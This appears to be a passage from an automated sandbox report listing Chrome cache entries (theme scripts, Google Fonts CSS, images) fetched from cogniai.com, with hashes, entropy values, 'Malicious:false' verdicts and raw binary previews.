                                                                                                                SHA-512:B1260C7A57DA64B5B6F68B243719A00A6543E76A096FD16250CAF7EF6A633601C0B43CEA254C30F8765757B9875F5A16C6DC8B97D1DB6C06D4A1C9A027447DE7
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://cogniai.com/wp-content/themes/techze/css/bootstrap.min.css?ver=1
                                                                                                                Preview:...........}.#9...~.O$...-.t.@....v..~.......\.+B.:b%E.......4..rEF...:2..hf4........+~S.a.;.....8.Mz......p....]u.ifo........{.._....a.0....~.?.+........P..iu<V.N...y..~^..Z...E./......:.?......G....n..\m.........."u?L.@.S.;[?V.7K...]m.........B....a.....p>......Mu=......7..h2...n_n......!.K.^.>a..A.....U....^.WT.X.k...on0{.....U9.]........ d~5.Z.gwQ..xT....._m.=@9...|..([..8.W...b.]...r.]m.....ko8]c.....fYB..!.}U~x.......I3)..tru..9L.,.W..q..nzs3.S?...a.O...T.,7........j.ZN...4\...p.6.?....T..B...E:....vU..~....lw.u..{..X.W..s.X]t~._....!........:....@..}.._W..g../..n. ...1X.6....P.._..O.......w.Tm..$..]..a......W.j_.W.m..P..w...t.?W..:...o:.i...5...n_=.v........:U.R....!i..9V...Z.......f.V...|D\U.\...p.....|n...B.6.9.l..d........U.<..Ug........|.C..V ..*.....~....N...;.....X....I...?<.v./O...V[.@..?.n..(..`_m..O,.q..5..%.f8.N.7..&%.|;]W....@.m...h'..9.3.{.../......n.x.nw....quX..............a.?..r.{.E`l...F..%....j.D3(......

                                                                                                                Chrome Cache Entry: 281

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, max compression, original size modulo 2^32 1907
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):560
                                                                                                                Entropy (8bit):7.499624497759461
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:XaWn/yKmfZWZxYl7ulXU790HpmPTF1Uis/XgVCxx:XPnalMXYlqlE790JmPJ1UiKgVCn
                                                                                                                MD5:3871D5163A6039754FD4984AAA98A9D6
                                                                                                                SHA1:E8A0D27FA6620386F33AB72228A1B4EEB06E0D5C
                                                                                                                SHA-256:299BA4F034422E82649B551608D55C3D9CDFA91B71E62C016BC673A29BEC084A
                                                                                                                SHA-512:C1FB2F204187257B46CEAA0219663FF6A71F7D459DA9C987DAAF4F4735CAA18B59187D142C3D151DD2F51968E8F4C49F5A9A230A585AF6F4F230DCA65F333060
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://fonts.googleapis.com/css2?family=Oswald&display=swap
                                                                                                                Preview:...........]o.0..........G...Y..v.T.*..M....B...E..{..C..Lbw..zl..z.|.......E9W^..k..(....s..u..&N.^.f.>.Huh...v.u...z.R..'.mn^.MS@....r[N..ms.Rj#'.....R.B.....:s.......?}.9...o.,GA)........m*....g...p.-...N.;......>..n^..]........L..h:&.|b..$.....,.fG......Y..G\.~..?9.w..N..:0Y......HC.+.....4..vu..b]..3kN.....x(.x(.YQ6.`..PC...m1n..@B.....5p.5..c...g.G.4..4......ji ........@.,1.... .,.#.)B...,dz....c.+....,.m&.G..i..:`.]@..!..@J....,...w.]i.+..x.........m..........u&...`...u.........R.Z...1...Y7..c`.'...6........xoa.s...

                                                                                                                Chrome Cache Entry: 282

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 332x380, components 3
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):31289
                                                                                                                Entropy (8bit):5.8205210915005035
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:LLmkNlAn997r5dy0jgoSTqwfSujWWxWErF4Bu183zDzBN:HtNC9BrXy3Tiuiotr6u183zD1N
                                                                                                                MD5:80D6B877FE3D1FECEC347B76A95C56CF
                                                                                                                SHA1:55874C4700A94697660E0DB40A5E0C039C774C01
                                                                                                                SHA-256:54BF90DB6E72523560C5B133AABA0822633F8E91C7A2EEA7A16ABEE5FBF9B1DF
                                                                                                                SHA-512:1055468B5A6814A4E7166C6D3640868234A68CBDE2F9270ADFFE383971687BFD2E8435EE667126255D80AFFE7F258C87F816E90873194E920C56103641A8F65A
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://cogniai.com/wp-content/uploads/2023/09/ss2-1.jpg
                                                                                                                Preview:......JFIF.....H.H....2-http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/">. <xmp:CreatorTool>Adobe Fireworks CS5.1 11.1.0.205 Windows</xmp:CreatorTool>. <xmp:CreateDate>2022-10-16T23:11:06Z</xmp:CreateDate>. <xmp:ModifyDate>2023-09-11T16:51:03Z</xmp:ModifyDate>. </rdf:Description>. <rdf:Description rdf:about="". xmlns:dc="http://purl.org/dc/elements/1.1/">. <dc:format>image/jpeg</dc:format>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>. .

                                                                                                                Chrome Cache Entry: 283

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, max compression, original size modulo 2^32 2569
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):627
                                                                                                                Entropy (8bit):7.594523322352576
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:XgOF33CYQ+LQCStBR1kPbw2bx/yX3LjxB/SJBmwapGZka/ZnFvO8w+:XgOF33HQCWRAkQtq3xe0VmT/ZnFK+
                                                                                                                MD5:3D544643A29FF71BD451A715E31B0887
                                                                                                                SHA1:316F9E04D3E96D8DAB30F6DE141990FD350B06C6
                                                                                                                SHA-256:4BEC98CCB3B95422E90A56F0AA045CCE25ABD330F5AA28E4106239510661A69D
                                                                                                                SHA-512:D932148BEA7317ADD68CDB9DB9A0DFF6493053FDC3E40624153B3EED58E4B966E6F2BEB51C58435C1EC1408731690F6E3278701647FB56F38BB173E4F2EC90DB
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://fonts.googleapis.com/css2?family=Source+Sans+Pro&display=swap
                                                                                                                Preview:...........M..0.........b..A.K....e[.....!.8,.....c..Jp.%..l.}g<......eYdf.......Zs.f..k`...Ey...E}hpb.V.xi...y.hOe>5....e.....vj.\.V..)n&..N..&.....{m..Z.\&...m...zk.Kt..<w........j..g..............l..z.>^...z..x....v8.....".W.........]b.....F.b.'..$...'..w+..&f.......?.q.{`}H..9_f.....u....v.._..gB.a.@....4y..W.x.z..j.s..&}.c..M.....@.J)6..T.b.tLp0Py...p....*.."..7.J...a.B....*.(L..W.Jp5.r.V...!$JbY..gD.Ml...j..L.i......B.P.JT.z......B.....!r.D..H.f:.0 ........=.OK..>.HH|....\..D.M....#DD?...a..;.....E.Rl..}.q...U...!.~P.....0ml(]>{.j...q.?'An...~..r.@E_7V_...::.E].{L,.........S.uT....

                                                                                                                Chrome Cache Entry: 284

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 26682
                                                                                                                Category:dropped
                                                                                                                Size (bytes):4254
                                                                                                                Entropy (8bit):7.954488866499963
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:1J7xHVexKB7sCIaldWEopywiGnYPtRAMYEueOPVweqZp8cHT:1J5K+7r3ZPJOEuemCDpLz
                                                                                                                MD5:6BB40D9BA35A3D93452BA7A67ED7F55F
                                                                                                                SHA1:DEFC4C0A2FABE587DC74380EF6B4F7EEC3D62EA7
                                                                                                                SHA-256:2E10443B1CB7512B8521B7F50CD489373A412CAA1430856770CDE4689AFD7541
                                                                                                                SHA-512:71F6B3FA9D068BB5063225953D69860AF283D8C4507C484F73C831E158CB252E4833844540990707B90711938D164FC391D8EE159B5A02DED67120D43D79C121
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:................[Ko....Wt.,.v?=.......0A..%@..UjqM...j.....J.VQ.j..j.3.....Q,........4.jJ?...T...W.0......Yr..-.......{[=..Eoo.)...JBY.!t...wYC.o....../..mn.7m?..}.>.......f...4.........n3.~.;-..)..8.-.y(...f.....L..k.[.y&...O.....~q.L.O?.2/.v...,.'...77o"4.6......N.{.0{ ..}...G.,..w..9#.....`O2...rlO.,.I<O.....S.......TN6}....8%.F.....'.........Z.z...`.5.lzJ....+.......bA.>X.*..V.^J......S.i.K.q..*.3...'HQ.0VI_;.4. H*."...i.OP.B....m.Q@)...x...6.s.@......Z0.a.D."..*o...C.r.........qHR1.b.....pR.TW08C..t.y4.|.!.I..)fP. ."\J........!.Y.Pp.l.{..oV8.p.mj.u^..)...C.KU...F[+..2........F]?..(..^.&..aS0,|.Au.aqN.Q..d.....cN...Ey..{.qq.'...h.}^.I..F"..xD[....^....G..sE;..c....+.tl.m#..|.T.WX.....r8.s/.3).FV*h_)t.O...p.Z.Uv......5F.B......5...R.O.7...&....S.7=..)......z. )-y<g.g. .g.tGu.PI.....K../...D=..e......C&...v....L..I...j..|..I...qN......S.N.....<..BlK.{.(.....k,H3....URU..=....$t*nF..`.qa3m.=.x:.....{..t..3.%..|.7f.b.........*`

                                                                                                                Chrome Cache Entry: 285

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1920x1080, components 3
                                                                                                                Category:dropped
                                                                                                                Size (bytes):141667
                                                                                                                Entropy (8bit):7.3133650632326495
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3072:r3CX9ydNXgMnIeATeUYkBBp7FqmTDZM++jgI6M0R8xkwCkZ:OQdFgMIeATLRpijjbp7dZ
                                                                                                                MD5:E963F6FED4402942320C4E9C9CDC0B57
                                                                                                                SHA1:9170640EF54AC628D6E4EB67C60278521799D8F5
                                                                                                                SHA-256:D224072C3B761CB6FFD63E35F215A8CB44FE24AE3E8D1EBA454BDEB4680EC12C
                                                                                                                SHA-512:E677C20C7E4319C444E944FD8EC6BFD0A3EAED5BDE4A3B4A917E7C0583F36D50F21365CABA7BABF148058B383C2D9977AB4EFE7F4F7F2CF050BD687D745310F7
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:......JFIF.....H.H....2-http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/">. <xmp:CreatorTool>Adobe Fireworks CS5.1 11.1.0.205 Windows</xmp:CreatorTool>. <xmp:CreateDate>2022-07-25T22:01:58Z</xmp:CreateDate>. <xmp:ModifyDate>2023-09-07T18:32:09Z</xmp:ModifyDate>. </rdf:Description>. <rdf:Description rdf:about="". xmlns:dc="http://purl.org/dc/elements/1.1/">. <dc:format>image/jpeg</dc:format>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>. .

                                                                                                                Chrome Cache Entry: 286

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1920x1080, components 3
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):141667
                                                                                                                Entropy (8bit):7.3133650632326495
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3072:r3CX9ydNXgMnIeATeUYkBBp7FqmTDZM++jgI6M0R8xkwCkZ:OQdFgMIeATLRpijjbp7dZ
                                                                                                                MD5:E963F6FED4402942320C4E9C9CDC0B57
                                                                                                                SHA1:9170640EF54AC628D6E4EB67C60278521799D8F5
                                                                                                                SHA-256:D224072C3B761CB6FFD63E35F215A8CB44FE24AE3E8D1EBA454BDEB4680EC12C
                                                                                                                SHA-512:E677C20C7E4319C444E944FD8EC6BFD0A3EAED5BDE4A3B4A917E7C0583F36D50F21365CABA7BABF148058B383C2D9977AB4EFE7F4F7F2CF050BD687D745310F7
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://cogniai.com/wp-content/uploads/2023/09/slider-techze-12-1.jpg
                                                                                                                Preview:......JFIF.....H.H....2-http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/">. <xmp:CreatorTool>Adobe Fireworks CS5.1 11.1.0.205 Windows</xmp:CreatorTool>. <xmp:CreateDate>2022-07-25T22:01:58Z</xmp:CreateDate>. <xmp:ModifyDate>2023-09-07T18:32:09Z</xmp:ModifyDate>. </rdf:Description>. <rdf:Description rdf:about="". xmlns:dc="http://purl.org/dc/elements/1.1/">. <dc:format>image/jpeg</dc:format>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>. .

                                                                                                                Chrome Cache Entry: 287

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:PNG image data, 3000 x 739, 8-bit/color RGBA, non-interlaced
                                                                                                                Category:dropped
                                                                                                                Size (bytes):64709
                                                                                                                Entropy (8bit):7.811073254382366
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:GS1+tHnZAhADcXRiKhlB+KZZPDfTSkRU/SpOftthY7HW4:G3nqh2cXRiOB+i5u6pOVthY7W4
                                                                                                                MD5:BAFA207F78ACA9D98EE5DAC4FA42621E
                                                                                                                SHA1:595B52109BA4CC86D44AC7510A542A7D6A68E686
                                                                                                                SHA-256:863451D2D9C1093E8ADECC00D764E6F04166A99E88AF4705C84985E461430FFC
                                                                                                                SHA-512:F9F17A6FDB987913050FDD984B64DE0CA6E97E4CA23AC22977C4DC1EA4B3C17F361D95CDA648910DDCF22DF2ACA3B96D8929B979A3EB7AF3C657D1E92F4F98ED
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:.PNG........IHDR...............H.....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.da4a7e5ef, 2022/11/22-13:50:07 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:2DA88F53A65A11EDA6589E79D73C718B" xmpMM:DocumentID="xmp.did:2DA88F54A65A11EDA6589E79D73C718B"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2DA88F51A65A11EDA6589E79D73C718B" stRef:documentID="xmp.did:2DA88F52A65A11EDA6589E79D73C718B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.....5IDATx....U.X.7..........D@9...P..t..G.t.."0..E.......".%...1.>.g.....;......>~....,.<..1..;?...5.O..

                                                                                                                Chrome Cache Entry: 288

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 7434
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):4004
                                                                                                                Entropy (8bit):7.942600684726719
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:nGa7GK+vK7SgmUttSihwnxrZkaqQdcSBCWQup:nSVSugmUttSRxrZk1IVCWV
                                                                                                                MD5:3D1A807DE95F4F5BC13F30D9DFC14662
                                                                                                                SHA1:A68A4202E121DEE1CEFF651B7A4072342D52DC36
                                                                                                                SHA-256:6D591272153D8F4F1C450041AAF7DF180B36E6AB07C7E7D0F8BC170D4306BE31
                                                                                                                SHA-512:AFFF50ABBF0F90FD6A3BB2978EC7DDEEF494E2A944F8FF06BA2F382CD8C005F0EA738F65E66F558AA213B0BCB4F97FD9572D00E6E59B0FFAD625833FE665C934
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://cogniai.com/wp-content/themes/techze/js/yukari-cik.js?ver=1
                                                                                                                Preview:...........YkW.H..~.z......Ik.a2.*.....A.fM...!).A...o?{W.b_.:g....R./..]..p......Py...U..'~..9.....t..?.(..<....^.t.........Z....No.....[Y..Y..F.b]..O.r..t.R...4>.Ye.u.N.q.......I.....7.'a....^QA.I........T^.!.Z..Me....;.I...^.$..+ >..m..I..M..O.;#..S..u....vit^.t.z.?....J=.|=..o._......k...t....qz|yz...\$..t.xk.....h....5#."K+^N]~..ZI.=.`]#..z]7>.Q.|j..k..0.&..t'y%$......"/i..?....`."=...f.%.......bF..I..L.i,.QF...,....%..fq%#s.#.d..+).+4.......z..|...9&.....?..I`}z-.i.J}..z?..<u....h.NR ..l..HX...>.;.^.d..*.>./U.-...Q..[.s.f~.?..Gx.R|6.....l..f'..$....a..E6...F..G...t..~..t?#............&.Z...g.M......}S;..;..$?.I..n.w..<[..95.6{q.iA...L...<7...0#Skw..tw..bf...d.;#._.Iv8.."........2./...d.C..up...<...E.../.......?.;..:hBN%....[..IFB.b...mK..Fa.e}p..;..{{.x...?.....BQ.#...M`.T....5,.'..h....o.`.'..YCq.m.....+.O.O..E..p..`Wx}+......).b.|.\)..2.a......j...|.H+Y5.*.|....>..T..(.m=..#.....wuy.^q#....P...}\....z>..G..x..t......r....y|.:=;.hw..W..}s{

                                                                                                                Chrome Cache Entry: 289

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, max compression, original size modulo 2^32 1926
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):561
                                                                                                                Entropy (8bit):7.597163311490799
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:XDyA+SzyWoyrw+JNGNIlJUT/53pXQleB89azJxt9DAwmGoyTKz:XtOWo4wgNGwqhtQy892rSRyTKz
                                                                                                                MD5:DC1F12E77780CD685EE2B3EE2B5608FA
                                                                                                                SHA1:FA6F486EF502E575683A5EAC5144BEE30A018C72
                                                                                                                SHA-256:7D2ECB92EDFD6E11C29DD02D53553EF1102FC28AC992924047427BEA7F83A922
                                                                                                                SHA-512:F301C917438C9639CCDEFA1EF8CADA833D62498C0E326232D7997F5DE84DC8750F6DC9406A04CA3B228B824A1EE95D60AE234C14796BA7FBBDB7C4B1BC9FF0F0
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://fonts.googleapis.com/css2?family=Raleway&display=swap
                                                                                                                Preview:............o.0....+...B..GBz.`..S.M.iB.H."pI..}...LZn...c[..{..sc.C[VU....g.z....f..~L,.iWV..~.*y...i.SC%WV...z.=.xP+.#.y...U..t.l.G.6_Y.mu...[9.^..Ne...y.s:.5.:..9t..........E...i.......>k.Dl.t......]..p-u5.qz.O}....v...\..+...&>.3..,..M.....{...q1.....Q.. R.......;.....9....<.....@.!.XC<..4...R.:..N^|n.3r....cD.BD...([...@.!@.....E. &3c.fN*\.j.......s.....!MEh..(F5.DQ.....Yf K....z........!....\/3..e....ac.cSrR.i. .. ..F...........h....ap'S...*.B.../..[..O.GP.u..............n..M!..3...(1:.3}.5.4z`.{..6...\K..........}.....

                                                                                                                Chrome Cache Entry: 290

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 332x500, components 3
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):29109
                                                                                                                Entropy (8bit):5.559870758163496
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:LTXF4iTGqhUxq0c5l16zfTbaSPqi0K6dE2sHW/8MpWkavp/uLRBef/Tp:HOiqqhUxj0+isTuE9W/8AW7Bm9U
                                                                                                                MD5:DA4A73A990CC670D4EA48EBF118B9145
                                                                                                                SHA1:AB9CD5CD211BB3F295ABD3AF607DCAE92B629CB1
                                                                                                                SHA-256:AD658E7C15DF5096BFB98E7B6FA28C85A03C0D5B4166983311EC4CA785DDBAA9
                                                                                                                SHA-512:B016929F31BEBD68F05CBD05D9CB4A7D5A47528585D675FEAB3DE1A2E66ADE039684B16B652E8756576DDB76A09DCEA2153E5EF670315CE7616DEB97C11FDCCD
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://cogniai.com/wp-content/uploads/2023/09/projects-ai-2.jpg
                                                                                                                Preview:......JFIF.....H.H....2-http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/">. <xmp:CreatorTool>Adobe Fireworks CS5.1 11.1.0.205 Windows</xmp:CreatorTool>. <xmp:CreateDate>2022-10-16T23:11:06Z</xmp:CreateDate>. <xmp:ModifyDate>2023-09-07T19:53:49Z</xmp:ModifyDate>. </rdf:Description>. <rdf:Description rdf:about="". xmlns:dc="http://purl.org/dc/elements/1.1/">. <dc:format>image/jpeg</dc:format>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>. .

                                                                                                                Chrome Cache Entry: 291

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, max compression, original size modulo 2^32 836
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):381
                                                                                                                Entropy (8bit):7.400578411043331
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6:XtPvgkZDerWfwAw/+4nY7o6LvlOXiC2uT716JFWz79uuFAGECkU9iEu1W:XB4QDCVDvnY9voXL2k6Le7s4AGECkQ
                                                                                                                MD5:46B03076B1E973910372D78203AB28CB
                                                                                                                SHA1:4C71E3FD50580084696EB069A413004D0859AE92
                                                                                                                SHA-256:97BF9013ABDC79369C67E65957F39B2C5377445470BD018529D1F766F175A1F1
                                                                                                                SHA-512:9472774606626753779A10594B4E24B7BC71E5D5CD6B5B27C54298AE733F06AD20004A176BEE732D7685B815A7C83403FB64E0F107FA9BCBB282993D2DD97B6B
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://fonts.googleapis.com/css2?family=Mate+SC&display=swap
                                                                                                                Preview:...........OO.0.........?........#z_...ZD4~w.p4..<..M....2U..P`...uS+....|y.8..)..C......yE.SU.n.]V]f.E....0..J..2.D.....m..C[..J.e..)..T.:.0ovH..>P..R.k1].>.xh^Zz....2z[....zM...}...;...C]...mVo.-..0..b.&..h.5.....`...xh..2!:.....&.L.....vEdn`.9.T..N1.6....:...]!$.Mt...mIH1LB!f.....&.~.m....U.=;...1.z.....<+.8[N.g....=...%a..)....V.^p.}..t.!.Q.........t^.D...

                                                                                                                Chrome Cache Entry: 292

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 9337
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):4611
                                                                                                                Entropy (8bit):7.954270462766329
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:4WqblfTRiCwe2mwXfbbr86odgVHaKUF/TGxxCO8Itf7WKS6KvuIDxj6EUDcM:4Wqbld8e2tvvrfVHSF/arCO8kT1S6KvU
                                                                                                                MD5:9437B265D0628E5D69F9DEA78D7415E8
                                                                                                                SHA1:E2AD82F831F9CCC0EC466796FCA9FBF7798DFF02
                                                                                                                SHA-256:2EAA852D25C24DD40F001A47991CCDC5355D08245ABEC6E903FE1FC80B26F9F3
                                                                                                                SHA-512:0344D74ED469295955DF49FC4E1A67E9410978B4249A65D644430BCAD71CE81F3A67DD83452D50B1D3A0F6616D5CE4407ED182A6A1C077C7A13667F96C5F471C
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://cogniai.com/wp-content/themes/techze/js/pointer.js?ver=1
                                                                                                                Preview:...........Z{[.H...>EdgM2d0....}...*...e...!1$.....|.S.........}....+.......I...IK.SnnM9'%VF\.~...m.KRn6%\.ssbO..L%v..b.s....P.`be..e....|^.Y..g......Q.I.O_v>}r.x...s..&.,"qVb....gB..........B>..&Y!g......D..,p..i-.N.R.OI......,.. .q.`.$..C.#..<.iL2.J..}..U.........^Q...p..S..g?...Uf. ....u.-!.d.xD...O4(.A.&.R.St..FB:..0t...>...q...S&.mD..}K.......cQ.>Y:#.s.M....R.2.....C.$.....).fi.......p.W.b...9 ...8(Pf.!..#.2.3"...<be>x#...%.5.g..=.=..2r.6.q.~...x..S.^.a......j?.4....U....#....N.D.t..r.?.V.....(jpP.........M......#........3..+.Br.4..7.]%.u.@gR...'.Tq...0n_(osJ...kR4..<.H..#c.dI*.J.......2........erW......$....`.'.........?/.`.....A.IZ.......p.I..~M.....G.....2.|'...&..u..D...d...].......c....6".I<.K#.t.....Q..3....B...-L..3.L.p....L...q.....n2m......g."/....i.....!.J...,.Y....#.r.>....b.8...u...q..\w..I4Ib....&D......QWv...zl..S.|....g.j=k....o.n...../...]t..Tn...g.....It&.....d..XI.@.....;K,a..RI.3.8.D...l..K..P..,}....5....H

                                                                                                                Chrome Cache Entry: 293

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, max compression, original size modulo 2^32 5746
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):1518
                                                                                                                Entropy (8bit):7.836206132480718
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:X5iJAaG+gcWUynHi3VT2FwltbgZIQ2kDwrZnJ5V8chiF90kdOvNVJp+:X5MfWlwlt+PwPhLkdGh+
                                                                                                                MD5:3267D4F5CA6393B03296519A3A13C27A
                                                                                                                SHA1:109B338FE11677468F502770DE6D793751181738
                                                                                                                SHA-256:E1AC33CD3F97B24773F8233732C6701A59B660C4A799A06D5FDF7C050755CF10
                                                                                                                SHA-512:B397521156AAA9386E58840FFD7970EE1B76F1E2E699B266E2CAAF29F8E7AC8D7FB345102A2D1D59493AC5D1051E56DF7856FEB5B9A937906AA7C022BCEA492B
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://fonts.googleapis.com/css2?family=Roboto&display=swap
                                                                                                                Preview:...........WK.[5....3m.m......~.....-.L...i.%.t...#.RZX...6.K.-K.$....d~.[.V.y...0y2=..j.9tW..b...dBh.\._L...^n....<.?.....v.....w.....bb..Dr.8.o.&R....o.....h....c.~7....V.n.............a9.6....b....../...|.T...yx........~..x.:...:......^.....,.n..{v...R.a........."n7......6..W_.cE'zU...q..4....T...T*U.[#:o].%..AS...s6........Z....\..M_.p.......%.%.^...w'..o....Ke).S....^?$...2=.O...Z2...h...H4C.o....pt4..9.?o..:..|%ts....96 .QE..$.@Y.V.)E.P.:5..hC..Mj5M7.hj...G....D..$R...t.L.B#......fh@..m.@c.F..DI....qi....I.5....#..&..@&..Cgn. m:.G...AO`...U...9N..i...f_.T.IG.....K...@I........*.|.Mh....#.a...5L.....v.]O4.`hn..$.N~0.634..7.}.D....(.z..\_.B.M.4M........=. r... h...).....C]j)} Z. ...2.V.3.....~}.].O...j...+D. ...:....-.......:uY!hI*{L..sG..$..K2[.~.,.r}..o..f..G#Z:.`......%....P*...,40.3N..s...-..I..(.1.... a.U.P#...*&...@.n.`\..~...bR./-Y....+..a...."..J. .'za.P.JEP..Y.. 8.Z.."u.2l..2..L.B=.D..-1.....".i..X...z...B..<...-.B^F..-.a.pUb.......AF

                                                                                                                Chrome Cache Entry: 294

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 16175
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):7278
                                                                                                                Entropy (8bit):7.971890346651074
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:jO0Y06TQD4QYwbPOh3dv9sf/Ho6OHkFX49tY5r8aA:Jku4foGDv9sf/IfEFI965r83
                                                                                                                MD5:1A647094655A7354E6FC50695CA03C27
                                                                                                                SHA1:7C5B568B05C04AA8F80D1F1A136181419EE8ECB8
                                                                                                                SHA-256:1FF5585CAE4DF6019CC1E58BB36B2831B30B60D6C25C0AD607F2A55AE6F7480B
